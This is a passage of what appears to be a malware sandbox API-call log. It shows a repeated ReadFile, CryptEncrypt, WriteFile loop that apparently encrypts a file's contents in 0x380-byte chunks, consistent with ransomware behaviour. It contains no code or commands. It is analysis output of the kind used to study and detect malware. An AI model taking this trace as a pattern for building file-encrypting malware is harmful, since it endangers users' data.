pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.059] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.059] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.059] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.060] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.061] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.061] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.062] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.063] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.063] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.064] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.064] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.065] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.066] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.066] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.067] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.067] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.067] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: 